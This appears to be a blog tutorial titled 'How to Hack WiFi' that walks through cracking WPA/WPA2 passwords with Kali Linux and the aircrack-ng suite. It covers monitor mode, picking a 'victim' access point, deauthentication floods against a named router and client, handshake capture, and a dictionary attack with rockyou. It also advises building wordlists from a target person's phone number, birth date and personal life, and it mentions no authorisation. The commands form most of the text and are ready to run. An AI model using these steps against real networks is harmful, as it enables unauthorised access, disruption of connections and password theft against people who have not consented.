How to Hack WiFi : Cracking  WPA2 WPA WiFi Password (100%)– Step by Step Guide

1- Kali Linux or Backtrack
2- Compatible Wreless Network Adapter that is supported in Kali Linux or Backtrack.
3- A good Wordlist

Step By Step How to Crack WPA2 WPA WiFi ( I am using Kali Linux Here )

1- Boot into Kali Linux. Open Terminal.

2- Start


to check the available devices we can use now .hack-wifi-cracking-wpa2-wpa-password-2
This will show the devices and we have to start airmon-ng to monitor mode on one of these devices probably wlan or wlan0 or wlan1


3- Enable monitor mode on wireless device
in terminal type

airmon-ng start wlan0

This will create a new monitor mode interface which will be wlan0mon or mon or wlan1mon , you should remember this or will have to check again from step 2.
If you face error just isse the followng command to correct it automatically and again run the above command

airmon-ng check kill


4- Select the taget Wifi Router or Access Point.
We need to fix a target WiFi Access Point (Router) we want to crack, to focus our attack we need Access Point’s (router) BSSID and Channel. Type the following commmand.

airodump-ng wlan0mon


we get a complete list of all reachable Access points with their BSSID Channel and Signal Strength , Type of Encryption. We are intrested only in BSSID and Chanel because rest we are going to crack. in th command above wlan0mon is the monitor mode interface we created in step 3. Choose your Victim based on Signal Strength which is in PWR Cloumn. When you got your Victim Access Point ( Router) you can stop this process by Ctrl+ Chack-wifi-cracking-wpa2-wpa-password-6

5- Now we start packet capturing from th Victim by the following command

airodump-ng --bssid (AP BSSID address) -c (chaneel no) -w (file name you want to save with) (monitor interface)

hack-wifi-cracking-wpa2-wpa-password-7Check the last line in above pic to see the command .

So here I type

airodump-ng --bssid F4:F2:6D:4E:3D:8E -c 3 -w WPAcrack wlan0mon

Packet Capturing has startedhack-wifi-cracking-wpa2-wpa-password-8

6- To capture a 4-wayhandshake we need clients connected to the Access Point to Reauthenticate with Access point, the already connected devices a=are listed in Station Column in step 5. So we can issue a command to send Deauthenticate signals to Access Point so that the try to reauthenticate and we capture Handshake.


aireplay-ng --deauth -a (BSSID of the network) -c (MAC address of the client) -100 (for deauntheticate "100" for no of packets to send) (monitor interface)


aireplay-ng --deauth 1000 -a F4:F2:6D:4E:3D:8E wlan0mon

This will send deauth signal to Victim Access Point to disconnect all clients possiblehack-wifi-cracking-wpa2-wpa-password-9

aireplay-ng --deauth 1000 -a F4:F2:6D:4E:3D:8E -c 9C:99:A0:F2:05:19 wlan0mon

This will disconnect a particular clinet on Access Point ( Router ) to get Handshake Quickly.hack-wifi-cracking-wpa2-wpa-password-10hack-wifi-cracking-wpa2-wpa-password-11

7- After a few Successful handshake Capture we are ready to Crack the password and get it in Plain Text.


Here we can see in Hilighted that Handshake from a Particular Client Captured. We can also check our present Working Directory for the Captured handshake File

8- Lets Crack this using Bruteforce Attack with aircrack-nghack-wifi-cracking-wpa2-wpa-password-13

the default synatx for aircrack-ng is

aircrack-ng -w (location of the password list) (cap file *.cap)

So here we do start the bruteforce on captured 4-way Handshake file by

aircrack-ng -w 'wordlist.txt' WPAcrack-01.cap


The Passowrd when crackd will be on you screen in Plaintext anytime soon.hack-wifi-cracking-wpa2-wpa-password-15
DONE, Password here is 01202323680, Higlighted in Pic.

Depending on the CPU and other hardwaer Specifications of your System this process will take some time as it may have to go through testing millions of passwords, So make a good but short wordlist to cut sort the number attempts and time taken. On

We need a Dictionary or Wordlist file to use Sample Pawwords from ,
How to Create a good wordlist with crunch– How To Make Good Wordlist using Crunch
Default Wordlist in Backtrack is at – /pentest/passwords/worldlists/darkc0de.lst

Default Wrdlist in Kali can be located and coppied in current working directory with the command below
cp /usr/share/wordlists/rockyou.txt.gz .
Unzip / Extract the wordlist file from the compressed file with this command
gunzip rockyou.txt.gz

Get the number of passwords in this wordlist file rock
wc -l rockyou.txt
14344392 passwords in this.

NOTE: A good wordlist should be short in case you know the person very well and can guess the password, so a wordlist can be generated consisting of his house number , name, love affairs, mobile number, date of birth and similar info. It may also be very random in that case you need a much bigger wordlist to try your patience. It may take even 10 Hours of time  in that case. You may also download wordlists available on net or try the Dictionary for whole words.

How To Disable monitor mode wlan0mon

airmon-ng stop wlan0mon


Don’t forget to restart the network manager. It is usually done with the following command:

service network-manager start



Please enter your comment!
Please enter your name here